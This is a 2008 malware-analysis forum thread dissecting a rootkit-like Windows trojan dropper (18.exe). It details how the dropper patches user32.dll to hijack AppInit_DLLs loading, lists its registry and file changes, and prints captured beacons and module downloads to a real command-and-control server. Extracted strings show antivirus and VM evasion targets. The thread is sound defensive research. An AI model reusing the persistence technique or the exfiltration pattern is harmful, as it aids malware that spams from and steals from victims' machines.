B.I.S.S. Forums > 18.exe and friends (System File Patching

Full Version: 18.exe and friends (System File Patching - rootkit behavior)

B.I.S.S. Forums > Malware News , Research & Removal > Malware Playground

Kimberly

Jan 3 2008, 12:31 AM

File details

Filename: 18.exe

File size: 132608 bytes
MD5: e8974f1bcf7297b67f2e22e76b7d3ced
SHA1: 02aae9ed2bed4f705dd5a5a35d1330a2e4345e2f
PEiD: ASPack v2.12 -> Alexey Solodovnikov
packers: Aspack
packers: ASPack

QUOTE
File 18.exe received on 01.01.2008 19:45:02
AhnLab-V3 2008.1.1.10 2007.12.31 -
AntiVir 7.6.0.46 2007.12.31 TR/Crypt.XDR.Gen
Authentium 4.93.8 2007.12.31 -
Avast 4.7.1098.0 2007.12.31 -
AVG 7.5.0.516 2008.01.01 SHeur.AJUJ
BitDefender 7.2 2008.01.01 -
CAT-QuickHeal 9.00 2007.12.31 -
ClamAV 0.91.2 2008.01.01 -
DrWeb 4.44.0.09170 2007.12.31 -
eSafe 7.0.15.0 2008.01.01 Suspicious File
eTrust-Vet 31.3.5421 2008.01.01 -
Ewido 4.0 2008.01.01 -
FileAdvisor 1 2008.01.01 -
Fortinet 3.14.0.0 2008.01.01 -
F-Prot 4.4.2.54 2007.12.31 -
F-Secure 6.70.13030.0 2008.01.01 W32/Smalltroj.BTCC
Ikarus T3.1.1.15 2008.01.01 -
Kaspersky 7.0.0.125 2008.01.01 -
McAfee 5196 2007.12.31 -
Microsoft 1.3109 2008.01.01 -
NOD32v2 2759 2008.01.01 -
Norman 5.80.02 2007.12.31 W32/Smalltroj.BTCC
Panda 9.0.0.4 2008.01.01 Suspicious file
Prevx1 V2 2008.01.01 -
Rising 20.24.52.00 2007.12.29 -
Sophos 4.24.0 2008.01.01 -
Sunbelt 2.2.907.0 2007.12.30 -
Symantec 10 2008.01.01 -
TheHacker 6.2.9.176 2008.01.01 -
VBA32 3.12.2.5 2007.12.31 -
VirusBuster 4.3.26:9 2008.01.01 -
Webwasher-Gateway 6.6.2 2007.12.31 Trojan.Crypt.XDR.Gen

______________________________

Filename: nvrsma.dll

File size: 179712 bytes
MD5: 1f8fb1df03431f507c440410c31db4ff
SHA1: fda38dbd3cbd745251e524f2e33d5b549e4971e8
PEiD: Microsoft Visual C++ 6.0 DLL

QUOTE
File nvrsma.dll received on 01.01.2008 20:30:17
AhnLab-V3 2008.1.1.10 2007.12.31 -
AntiVir 7.6.0.46 2007.12.31 TR/Crypt.XDR.Gen
Authentium 4.93.8 2007.12.31 -
Avast 4.7.1098.0 2007.12.31 -
AVG 7.5.0.516 2008.01.01 -
BitDefender 7.2 2008.01.01 -
CAT-QuickHeal 9.00 2007.12.31 -
ClamAV 0.91.2 2008.01.01 -
DrWeb 4.44.0.09170 2007.12.31 -
eSafe 7.0.15.0 2008.01.01 -
eTrust-Vet 31.3.5421 2008.01.01 -
Ewido 4.0 2008.01.01 -
FileAdvisor 1 2008.01.01 -
Fortinet 3.14.0.0 2008.01.01 -
F-Prot 4.4.2.54 2008.01.01 -
F-Secure 6.70.13030.0 2008.01.01 -
Ikarus T3.1.1.15 2008.01.01 -
Kaspersky 7.0.0.125 2008.01.01 -
McAfee 5196 2007.12.31 -
Microsoft 1.3109 2008.01.01 -
NOD32v2 2759 2008.01.01 -
Norman 5.80.02 2007.12.31 -
Panda 9.0.0.4 2008.01.01 -
Prevx1 V2 2008.01.01 -
Rising 20.24.52.00 2007.12.29 -
Sophos 4.24.0 2008.01.01 -
Sunbelt 2.2.907.0 2007.12.30 -
Symantec 10 2008.01.01 -
TheHacker 6.2.9.176 2008.01.01 -
VBA32 3.12.2.5 2007.12.31 -
VirusBuster 4.3.26:9 2008.01.01 -
Webwasher-Gateway 6.6.2 2007.12.31 Trojan.Crypt.XDR.Gen

______________________________

Filename: axt.hpl

File size: 83456 bytes
MD5: e7c62b593df2c2049879235b8ef21bd9
SHA1: 84685b682fa41a1b0c93b1061e18631c2d9561c3
PEiD: -

Filename: vtnr.gpg

File size: 68608 bytes
MD5: 8168bd0dd738dcd65466735cd8101daf
SHA1: 203acbaa92f5967415dc0445887ed7790bad4278
PEiD: -

Filename: mmg.cn

File size: 19456 bytes
MD5: ddb4d79b0696f0b6775c4fe256101c76
SHA1: 57bbd67959fbf917de8194fa2f8b7309f024ab35
PEiD: -

None of these files are detected at Virustotal because in their actual state they are just junk. They are PE files but have been encrypted using XOR keys.
We'll get back to them later on.

Visible signs

You might see the following lines in a Hijackthis log but they aren't really a sign that the malware is present. None of the actual scans are able to show this infection.

Logfile of Trend Micro HijackThis v2.0.2
...
F2 - REG:system.ini: Shell=c:\windows\explorer.exe
F2 - REG:system.ini: UserInit=c:\windows\system32\userinit.exe

Technical details

Registry changes.

Adds a loading point.
QUOTE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows "expInit_Dlls"
Type: REG_SZ
Data: nvrsma
Adds references that will be used by nvrsma.dll
QUOTE
HKEY_LOCAL_MACHINE\SOFTWARE\1 "31897356954C2CD3D41B221E3F24F99BBA"
Type: REG_DWORD
Data: 88, 40, 0C, 01
HKEY_LOCAL_MACHINE\SOFTWARE\1 "31AC70412E939D72A9234CDEBB1AF5867B"
Type: REG_SZ
Data: nqrckqqlqdrqrirprhqoqrqdpipmmondlqmenondqkmrnkmh
HKEY_LOCAL_MACHINE\SOFTWARE\1 "31C2E1E4D78E6A11B88DFA803456A1FFA5"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\2 "31897356954C2CD3D41B221E3F24F99BBA"
Type: REG_DWORD
Data: DB, 75, 78, 00
HKEY_LOCAL_MACHINE\SOFTWARE\2 "31AC70412E939D72A9234CDEBB1AF5867B"
Type: REG_SZ
Data: kgomncpjpnogoconproiodorrorcrmqjogqrqqrhqqnfrlqroj
HKEY_LOCAL_MACHINE\SOFTWARE\2 "31C2E1E4D78E6A11B88DFA803456A1FFA5"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\3 "31897356954C2CD3D41B221E3F24F99BBA"
Type: REG_DWORD
Data: FC, 7E, B4, 04
HKEY_LOCAL_MACHINE\SOFTWARE\3 "31AC70412E939D72A9234CDEBB1AF5867B"
Type: REG_SZ
Data: rnnhopmgmqnfnhnknemlmohoilijirjghlinimirejilih
HKEY_LOCAL_MACHINE\SOFTWARE\3 "31C2E1E4D78E6A11B88DFA803456A1FFA5"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "mid"
Type: REG_SZ
Data: 062A99746AF84FC7B9A8C8FF3886F4A0B8AF4FD217184E43BC81EF3280DB69FC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "st"
Type: REG_DWORD
Data: 01, 00, 00, 00
Miscellanous changes.
QUOTE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"
Old type: REG_SZ
New type: REG_SZ
Old data: Explorer.exe
New data: c:\windows\explorer.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\WINDOWS\system32\userinit.exe,
New data: c:\windows\system32\userinit.exe

Files added.

QUOTE
%windir%\Help\axt.hpl
Date: 1/2/2008 2:31 AM
Size: 83,456 bytes
%windir%\Help\vtnr.gpg
Date: 1/2/2008 2:31 AM
Size: 68,608 bytes
%system%\nvrsma.dll
Date: 1/2/2008 2:27 AM
Size: 179,712 bytes
%system%\fioakn
Date: 8/4/2004 1:00 PM
Size: 577,024 bytes
%system%\drivers\atmapi.sys
Date: 1/2/2008 2:31 AM
Size: 218 bytes

Files changed.

QUOTE
%system%\user32.dll
Old date: 8/4/2004 1:00 PM
New date: 1/2/2008 2:27 AM
Old size: 577,024 bytes
New size: 577,024 bytes
%system%\dllcache\user32.dll
Old date: 8/4/2004 1:00 PM
New date: 1/2/2008 2:27 AM
Old size: 577,024 bytes
New size: 577,024 bytes

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).
%system% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

What's so special about this infection

This infection is very complicated because several modules / functions overlap each other and it did also involve the patching of a system file. The malware did evolve because they added a couple of error checks since their first release. At any point if something goes wrong, the install is aborted.

Let’s try to cover as much as possible, so let’s step back to the very moment when 18.exe arrives on the computer.

1. What happens when 18.exe is ran on the PC?

Checks if already installed or not by querying the HKEY_LOCAL_MACHINE\SOFTWARE\1 key.
Checks if SeBeDugPrivilege is activated or not. If not, acquires it.
Duplicates Handles to folders (checks if failed or not)
Copies %system%\user32.dll to %system%\ [random name] – bhum in our sample.
Drops nvrsma.dll into the %system% folder.
Takes 2 random letters, appends pInit_Dlls to them and writes the loading point to the registry. expInit_Dlls in the screenshot / sample. Those 2 letters change each time you run the dropper.
Searches for the string " p i n i t _ d l l s" in %system%\ [random name] – bhum in our sample. Replaces “A p” with the same random letters as the registry value, “e x” in our test.
Copies %system%\ [random name] – bhum in our sample – as %system%\dllcache\user32.dll
Renames %system%\user32.dll as fioakn – this is also a random name.
Deletes %system%\ [random name] – bhum in our sample.
Since %system%\user32.dll is now missing, the file system protection will copy %system%\dllcache\user32.dll to the %system% folder. But … this copy isn’t genuine, it has been patched.

Why patch user32.dll? First you need to understand the impact of AppInit_DLLs.
Reference: Working with the AppInit_DLLs registry value.
QUOTE
The AppInit_DLLs value is found in the following registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

All the DLLs that are specified in this value are loaded by each Microsoft Windows-based application that is running in the current log on session.

The AppInit DLLs are loaded by using the LoadLibrary() function during the DLL_PROCESS_ATTACH process of User32.dll. Therefore, executables that do not link with User32.dll do not load the AppInit DLLs. There are very few executables that do not link with User32.dll.

Because of their early loading, only API functions that are exported from Kernel32.dll are safe to use in the initialization of the AppInit DLLs.

We do not recommend that applications use this feature or rely on this feature. There are other techniques that can be used to achieve similar results.

The AppInit_DLLs value has type "REG_SZ." This value has to specify a NULL-terminated string of DLLs that is delimited by spaces or by commas. Because spaces are used as delimiters, do not use long file names. The system does not recognize semicolons as delimiters for these DLLs.

Typically, only the Administrators group and the LocalSystem account have write access to the key that contains the AppInit_DLLs value.
user32.dll being patched, it will not load the dlls anymore from the AppInit_DLLs value but it will load the dll’s from expInit_Dlls instead, meaning nvrsma.dll.
Now, nvrsma.dll will not be loaded under every executable like the AppInit Dlls, it will only load under the winlogon.exe with NT AUTHORITY\SYSTEM privileges. Each process will try but will encounter a file lock.
In order to fully load the infection, a reboot is needed. Previous versions simply killed explorer.exe, csrss.exe and winlogon.exe which often resulted in a BSOD. This time they coded a reboot.
You’ll notice briefly a system message as the reboot is initiated with a delay of 1 second. In case you miss it, event viewer is able to log it.

In the second part of the analysis we will cover what happens after the reboot.

Kimberly

Jan 3 2008, 04:58 PM

After reboot, nvrsma.dll is loaded under the winlogon process.

IPB Image

A couple of minutes later several "events" occur.

nvrsma.dll drops the encrypted files axt.hpl and vtnr.gpg into the Windows Help folder and creates their corresponding registry entries under HKEY_LOCAL_MACHINE\SOFTWARE\1 and HKEY_LOCAL_MACHINE\SOFTWARE\2.
Both files look scrambled because they are encrypted. Once loaded into memory they will be xored with the keys stored under their respective registry values. Once xored, the file becomes a functional PE.
In its initial encrypted state, the file isn’t detected by Antivirus products but the xored file is already detected by a few vendors.
QUOTE
File Kim_axt.hex received on 01.02.2008 18:49:18
AntiVir 7.6.0.46 2008.01.02 HEUR/Malware
DrWeb 4.44.0.09170 2008.01.02 DLOADER.Trojan
F-Secure 6.70.13030.0 2008.01.02 Backdoor.Win32.Agent.dpe
Ikarus T3.1.1.15 2008.01.02 not-a-virus:AdWare.Win32.NaviPromo.k
Kaspersky 7.0.0.125 2008.01.02 Backdoor.Win32.Agent.dpe
VBA32 3.12.2.5 2008.01.02 suspected of Malware.Agent.32
Webwasher-Gateway 6.6.2 2008.01.02 Heuristic.Malware.
Both are Microsoft Visual C++ 6.0 DLL’s.
atmapi.sys is also dropped in the %system%\drivers folder. It is not a driver; it’s just a text file. I suspect it is being used as a white list / blacklist for applications.
Creation of a unique identifier, stored under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "mid"
062A99746AF84FC7B9A8C8FF3886F4A0 & B8AF4FD217184E43BC81EF3280DB69FC which gives us 062A99746AF84FC7B9A8C8FF3886F4A0B8AF4FD217184E43BC81EF3280DB69FC
This is performed by axt.hpl using CoCreateGuid and StringFromGUID2
QUOTE
000104F8 100116F8 0 StringFromGUID2
0001050A 1001170A 0 CoCreateGuid
Kaspersky gives several alerts about a hidden object under smss.exe. Remember, xored files are detected by a couple of vendors. Unfortunately it's impossible to know which modules are loaded, but I do suspect that both are mapped into memory.
Network activity is initiated by "winlogon.exe" but in reality this is performed by axt.hpl.
QUOTE
Hypertext Transfer Protocol
POST /*****/ HTTP/1.0\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: 91.194.76.142\r\n
Content-Length: 112\r\n
Pragma: no-cache\r\n
\r\n
Line-based text data: application/x-www-form-urlencoded
s=0000201840911cf96bd0823fe18cb34e481712df4fa8b0a4f6883ff8c8a9b7cf48fa64799a260q0d1281l0t1q1d23297l0t1q2d769l0t1
Notice the part in red? Read it backwards and we see our MID indentifier here. The server replies back with random strings …
QUOTE
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Date: Thu, 03 Jan 2008 15:44:48 GMT\r\n
Server: Apache/2.0.59\r\n
Expires: Mon, 26 Jul 1980 05:00:00 GMT\r\n
Cache-Control: private\r\n
Pragma: no-cache\r\n
Content-Length: 194\r\n
Connection: close\r\n
Content-Type: text/html\r\n
\r\n
Line-based text data: text/html
pdrrliqmqhkklhlilfpqomolpqplojpnpepkofplplpqocoiodpnkcorpklgonphlildlmpcloiqepii
ijiifdiefcfdinfmfpfhfnikfrjeejehegedjieejdjpenerepepeperjodjdjcqdeckdedqdqdndqde
dqdqifgpeggfgngdhrghhleheffleneq
In previous versions either nibble.exe or cm.exe were downloaded from the server and that file was not encrypted. We notice an evolution here too. This time they chose to encrypt the downloaded file. The xor key will be stored in the registry under HKEY_LOCAL_MACHINE\SOFTWARE\3.
The file will be saved as %windir%\Help\mmg.cn. Once decrypted, mmg.cn doesn't have a property tab but the module is called ModMailGrabber.dll.
QUOTE
Hypertext Transfer Protocol
GET /*****/*****/mmg.cn HTTP/1.0\r\n
Accept: */*\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
Host: 91.194.76.142\r\n
~~~~~~~~~~: ~~~~~~~~~~\r\n
\r\n
Another transmission to the server. This time the MID identifier isn’t inverted.
QUOTE
Hypertext Transfer Protocol
POST /*****/ HTTP/1.0\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: 91.194.76.142\r\n
Content-Length: 77\r\n
Pragma: no-cache\r\n
\r\n
Line-based text data: application/x-www-form-urlencoded
062A99746AF84FC7B9A8C8FF3886F4A0B8AF4FD217184E43BC81EF3280DB69FC\001\377\000LAAAAAAAAA
Updating of the root certificates and certificates from Versign.
QUOTE
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Content-Length: 569\r\n
Content-Type: application/pkix-crl\r\n
Last-Modified: Wed, 24 Aug 2005 18:22:06 GMT\r\n
Accept-Ranges: bytes\r\n
ETag: "09b60bbd8a8c51:417d"\r\n
Server: Microsoft-IIS/6.0\r\n
X-Powered-By: ASP.NET\r\n
Date: Thu, 03 Jan 2008 15:45:32 GMT\r\n
\r\n
Certificate Revocation List

Hypertext Transfer Protocol
GET /pki/crl/products/CodeSignPCA2.crl HTTP/1.1\r\n
Accept: */*\r\n
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180\r\n
Host: crl.microsoft.com\r\n
Connection: Keep-Alive\r\n
Cache-Control: no-cache\r\n
Pragma: no-cache\r\n
\r\n

Hypertext Transfer Protocol
GET /pca3.crl HTTP/1.1\r\n
Request Method: GET
Request URI: /pca3.crl
Request Version: HTTP/1.1
Accept: */*\r\n
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180\r\n
Host: crl.verisign.com\r\n
Connection: Keep-Alive\r\n
Cache-Control: no-cache\r\n
Pragma: no-cache\r\n
\r\n
Spam time. It’s not using the port 25 like most of mass mailers but operates on port 90 instead. Spamming is handled by axt.hpl.
In meanwhile our bugger vtnr.gpg started to rewrite registry values. The exact purpose is yet unknown by me. I strongly suspect it does eliminate other malware. (*)
It goes through the process list, kills certain applications and deletes their corresponding run keys and/or services from the registry so that they don’t load on next reboot. (*) I strongly suspect axt.hpl doing this but I could be wrong. All files are linked and relay on each other. Due to the rootkit behavior it's not easy to analyse them.

(*) The hardcoded list in the different files is huge and we will try to clarify this a little bit in part 3.

Special thanks to Micha P. for providing me links to XOR tools.

Kimberly

Jan 6 2008, 09:41 PM

File strings

Below is a partial list of strings found in the different modules.

axt.hpl

CODE
00010532 10011732 0 URLDownloadToFileA
0001056C 1001176C 0 DnsRecordListFree
00010580 10011780 0 DnsQuery_A
0001058C 1001178C 0 DNSAPI.dll
00010642 10011842 0 ModHttpCommunication.dll
0001069E 1001189E 0 NotifyFromServer
000106AF 100118AF 0 NotifyMailer
000106BC 100118BC 0 NotifyServer
000111F8 100129F8 0 HELO %s
00011204 10012A04 0 MAIL FROM: <%s>
00011218 10012A18 0 RCPT TO: <%s>
00012200 10013A00 0 ModCommunication
0001221C 10013A1C 0 ke_RegisterAndLoadNewModule
00012238 10013A38 0 \help\
00012244 10013A44 0 softstat
0001226C 10013A6C 0 ke_GetNextObj
00012288 10013A88 0 c:\crashdump.log
000122A0 10013AA0 0 SOFTWARE\Microsoft\Windows\CurrentVersion
00012384 10013B84 0 Content-Type: application/x-www-form-urlencoded
0001249C 10013C9C 0 .log.htm
000124A8 10013CA8 0 main.log.htm
000124B8 10013CB8 0 \internet explorer
000124CC 10013CCC 0 ProgramFilesDir
000124DC 10013CDC 0 Software\
000124E8 10013CE8 0 mcafee
000124F0 10013CF0 0 McAfee\VirusScan
00012504 10013D04 0 drweb
0001250C 10013D0C 0 Doctor Web, Ltd.
00012520 10013D20 0 fprot
00012528 10013D28 0 FRISK Software International
0001254C 10013D4C 0 KasperskyLab
0001255C 10013D5C 0 antivir
00012564 10013D64 0 SYSTEM\ControlSet001\Services\avgntflt
0001258C 10013D8C 0 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AntiVir PersonalEdition Classic
000125E0 10013DE0 0 avast
000125E8 10013DE8 0 ALWIL Software\Avast
00012608 10013E08 0 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ClamAV
00012648 10013E48 0 Ukranian Antivirus center
00012668 10013E68 0 *\shellex\ContextMenuHandlers\NOD32 Context Menu Shell Extension
000126AC 10013EAC 0 bitdef
000126B4 10013EB4 0 SOFTWIN\BitDefender Desktop\Maintenance\Install
000126E8 10013EE8 0 Vba32
000126F0 10013EF0 0 symantec
000126FC 10013EFC 0 Symantec\Symantec AntiVirus
00012718 10013F18 0 panda
00012720 10013F20 0 Panda Software
00012730 10013F30 0 spy_adaware
0001273C 10013F3C 0 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ad-Aware SE Personal
00012788 10013F88 0 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ad-aware 6 Personal
000127D0 10013FD0 0 spy_spybot
000127DC 10013FDC 0 PepiMK Software\SpybotSnD
000127F8 10013FF8 0 spy_arovax
00012804 10014004 0 Arovax AntiSpyware
00012818 10014018 0 spy_avg
00012820 10014020 0 Grisoft\AVGAntiSpyware
00012838 10014038 0 spy_ppatrol
00012844 10014044 0 ComputerAssociates\eTrustPestPatrol
00012868 10014068 0 spy_mcafee
00012874 10014074 0 McAfee\McAfee AntiSpyware
00012890 10014090 0 spy_begone
0001289C 1001409C 0 Spyware Begone!
000128AC 100140AC 0 spy_doctor
000128B8 100140B8 0 Chilkat Software, Inc.
000128D0 100140D0 0 spy_blaster
000128DC 100140DC 0 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpywareBlaster_is1
00012924 10014124 0 spy_sweeper
00012930 10014130 0 AllFilesystemObjects\shellex\ContextMenuHandlers\SpySweeper
0001296C 1001416C 0 spy_msdef
00012978 10014178 0 SYSTEM\CurrentControlSet\Services\WinDefend
000129A4 100141A4 0 sf_vmware
000129B0 100141B0 0 VMware, Inc.
000129C0 100141C0 0 hp_vmtools
000129CC 100141CC 0 VMware, Inc.\VMware Tools
000129E8 100141E8 0 hp_redpill
000129F4 100141F4 0 hp_vmio
00012CA6 100160A6 0 VS_VERSION_INFO
00012D02 10016102 0 StringFileInfo
00012D26 10016126 0 040904b0
00012D3E 1001613E 0 Comments
00012D56 10016156 0 CompanyName
00012D76 10016176 0 FileDescription
00012D98 10016198 0 ModHttpCommunication DLL
00012DD2 100161D2 0 FileVersion
00012DEC 100161EC 0 1, 7, 0, 1
00012E0A 1001620A 0 InternalName
00012E2A 1001622A 0 LegalCopyright
00012E48 10016248 0 Copyright © 2007
00012E76 10016276 0 LegalTrademarks
00012E9E 1001629E 0 OriginalFilename
00012EC0 100162C0 0 ModHttpCommunication.DLL
00012EFA 100162FA 0 PrivateBuild
00012F1A 1001631A 0 ProductName

vtnr.gpg

CODE
0000D9B6 1000E5B6 0 ReadProcessMemory
0000D9CA 1000E5CA 0 GetCurrentProcess
0000DA5A 1000E65A 0 GetProcAddress
0000DA6C 1000E66C 0 GetModuleHandleA
0000DA80 1000E680 0 OutputDebugStringA
0000DA96 1000E696 0 FindClose
0000DAA2 1000E6A2 0 FindNextFileA
0000DAB2 1000E6B2 0 Sleep
0000DABA 1000E6BA 0 FindFirstFileA
0000DB3E 1000E73E 0 DeleteFileA
0000DB88 1000E788 0 Process32Next
0000DB98 1000E798 0 Process32First
0000DBAA 1000E7AA 0 CreateToolhelp32Snapshot
0000DBC6 1000E7C6 0 OpenProcess
0000DBD4 1000E7D4 0 TerminateProcess
0000DBE8 1000E7E8 0 GetExitCodeProcess
0000DBFE 1000E7FE 0 GetCurrentProcessId
0000DC14 1000E814 0 SuspendThread
0000DC24 1000E824 0 ResumeThread
0000DC34 1000E834 0 TerminateThread
0000DDA8 1000E9A8 0 GetDesktopWindow
0000DDBC 1000E9BC 0 GetWindowTextLengthA
0000DDD4 1000E9D4 0 IsWindowVisible
0000DDE6 1000E9E6 0 GetWindowThreadProcessId
0000DE02 1000EA02 0 EnumWindows
0000DFA4 1000EBA4 0 CertNameToStrA
0000DFB4 1000EBB4 0 CRYPT32.dll
0000E354 1000F154 0 \internet explorer
0000E368 1000F168 0 ProgramFilesDir
0000E378 1000F178 0 SOFTWARE\Microsoft\Windows\CurrentVersion
0000E3A4 1000F1A4 0 NtRenameKey
0000E3B0 1000F1B0 0 ntdll.dll
0000E3BC 1000F1BC 0 UMH::SCANABORTED
0000E3D0 1000F1D0 0 FOLDER BANNED
0000E400 1000F200 0 \InprocServer32
0000E410 1000F210 0 CLSID\
0000E42C 1000F22C 0 \systemroot
0000E44C 1000F24C 0 deleting: %s:%s
0000E45C 1000F25C 0 PackedCatalogItem
0000E470 1000F270 0 LibraryPath
0000E47C 1000F27C 0 \Catalog_Entries\
0000E490 1000F290 0 \Catalog_Entries
0000E4A4 1000F2A4 0 System\CurrentControlSet\Services\Winsock2\Parameters
0000E4DC 1000F2DC 0 Num_Catalog_Entries
0000E4F8 1000F2F8 0 Current_Protocol_Catalog
0000E514 1000F314 0 Current_NameSpace_Catalog
0000E530 1000F330 0 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
0000E568 1000F368 0 AppInit_DLLs
0000E578 1000F378 0 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*
0000E5C4 1000F3C4 0 Debugger
0000E5D0 1000F3D0 0 SOFTWARE\Microsoft\Internet Explorer\Extensions\*
0000E60C 1000F40C 0 SOFTWARE\Microsoft\Internet Explorer\Toolbar
0000E63C 1000F43C 0 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\*
0000E688 1000F488 0 SYSTEM\CurrentControlSet\Services\*
0000E6AC 1000F4AC 0 ImagePath
0000E6B8 1000F4B8 0 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\*
0000E6F8 1000F4F8 0 DllName
0000E700 1000F500 0 SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
0000E740 1000F540 0 SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
0000E77C 1000F57C 0 SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
0000E7B0 1000F5B0 0 SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
0000E7E4 1000F5E4 0 SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0000E814 1000F614 0 Shell
0000E81C 1000F61C 0 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
0000E854 1000F654 0 UserInit
0000E860 1000F660 0 WTHelperGetProvSignerFromChain
0000E880 1000F680 0 WTHelperProvDataFromStateData
0000E8A0 1000F6A0 0 CryptCATAdminReleaseCatalogContext
0000E8C4 1000F6C4 0 CryptCATCatalogInfoFromContext
0000E8E4 1000F6E4 0 CryptCATAdminReleaseContext
0000E900 1000F700 0 CryptCATAdminEnumCatalogFromHash
0000E924 1000F724 0 CryptCATAdminCalcHashFromFileHandle
0000E948 1000F748 0 CryptCATAdminAcquireContext
0000E964 1000F764 0 WinVerifyTrust
0000E974 1000F774 0 wintrust.dll
0000EA14 1000F814 0 DbgUiStopDebugging
0000EA28 1000F828 0 DbgUiDebugActiveProcess
0000EA40 1000F840 0 DbgUiConnectToDbg
0000EA54 1000F854 0 ZwQueryInformationProcess
0000EA70 1000F870 0 ZwQuerySystemInformation
0000EA8C 1000F88C 0 SeDebugPrivilege
0000EAA8 1000F8A8 0 CompanyName
0000EAB4 1000F8B4 0 LegalCopyright
0000EAC4 1000F8C4 0 FileVersion
0000EAD0 1000F8D0 0 ProductVersion
0000EAE0 1000F8E0 0 InternalName
0000EAF0 1000F8F0 0 FileDescription
0000EB54 1000F954 0 %SYSTEMROOT%\system32\rsvpsp.dll
0000EB78 1000F978 0 %SYSTEMROOT%\system32\winrnr.dll
0000EB9C 1000F99C 0 %SYSTEMROOT%\system32\mswsock.dll
0000EBC0 1000F9C0 0 %PROGRAMFILES%\internet explorer\iexplore.exe
0000EBF0 1000F9F0 0 %PROGRAMFILES%\messenger\msmsgs.exe
0000EC14 1000FA14 0 %SYSTEMROOT%\explorer.exe
0000EC30 1000FA30 0 %SYSTEMROOT%\system32\cmd.exe
0000EC50 1000FA50 0 %SYSTEMROOT%\system32\wscntfy.exe
0000EC74 1000FA74 0 %SYSTEMROOT%\system32\alg.exe
0000EC94 1000FA94 0 %SYSTEMROOT%\system32\ctfmon.exe
0000ECB8 1000FAB8 0 %SYSTEMROOT%\system32\nvsvc32.exe
0000ECDC 1000FADC 0 %SYSTEMROOT%\system32\spoolsv.exe
0000ED00 1000FB00 0 %SYSTEMROOT%\system32\svchost.exe
0000ED24 1000FB24 0 %SYSTEMROOT%\system32\lsass.exe
0000ED44 1000FB44 0 %SYSTEMROOT%\system32\services.exe
0000ED68 1000FB68 0 %SYSTEMROOT%\system32\winlogon.exe
0000ED8C 1000FB8C 0 %SYSTEMROOT%\system32\csrss.exe
0000EDAC 1000FBAC 0 %SYSTEMROOT%\system32\smss.exe
0000EDCC 1000FBCC 0 rundll32.exe
0000EDDC 1000FBDC 0 documents and settings
0000EDF4 1000FBF4 0 microsoft
0000EE00 1000FC00 0 svchost.exe
0000EE0C 1000FC0C 0 iexplore.exe
0000EE1C 1000FC1C 0 %SYSTEMROOT%\system32\userinit.exe
0000EE70 1000FC70 0 %SYSTEMROOT%\system32\rundll32.exe
0000EE94 1000FC94 0 ashmaisv.exe
0000EEA4 1000FCA4 0 microsoft security adviser
0000EEC0 1000FCC0 0 jusched.exe
0000EECC 1000FCCC 0 %PROGRAMFILES%\skype\phone\skype.exe
0000EEF4 1000FCF4 0 %PROGRAMFILES%\belkin\belkin wireless network utility\wlservice.exe
0000EF44 1000FD44 0 NotifyServer
0000EF70 1000FD70 0 Stack:
0000EFD2 1000FDD2 0 Registers dump:
0000EFE4 1000FDE4 0 CPUInfo:Count:%u Type:%u
0000F000 1000FE00 0 MemInfo:TotalMem:%uMB VirtAvail:%uMB PhysAvail:%uMB MemLoad:%u%%
0000F044 1000FE44 0 Country:%s OS info: MajorVersion:%u MinorVersion:%u BuildNum:%u
0000F08A 1000FE8A 0 GetTickCount(0x%.8X) GetCurrentThreadId(0x%.8X) GetLastError(0x%.8X)
0000F0D6 1000FED6 0 CS:0x%.8X DS:0x%.8X ES:0x%.8X GS:0x%.8X FS:0x%.8X SS:0x%.8X ExcptFlags=0x%.8X
0000F124 1000FF24 0 %sUnhandled Exception process:[%s] in module [%s] #0x%.8X at addr:0x%.8X
0000F16E 1000FF6E 0 EAX=0x%.8X EBX=0x%.8X ECX=0x%.8X EDX=0x%.8X ESI=%.8X EDI=%.8X EIP=%.8X ESP=%.8X EBP=%.8X EFL=%.8X
0000F1D0 1000FFD0 0 %suptime %u hours %u mins %u secs
0000F1F3 1000FFF3 0 ----------------------------------------
0000F220 10010020 0 host: %s; country: %s; ip:
0000F23C 1001003C 0 %SYSTEMROOT%\system32\drivers\atmapi.sys
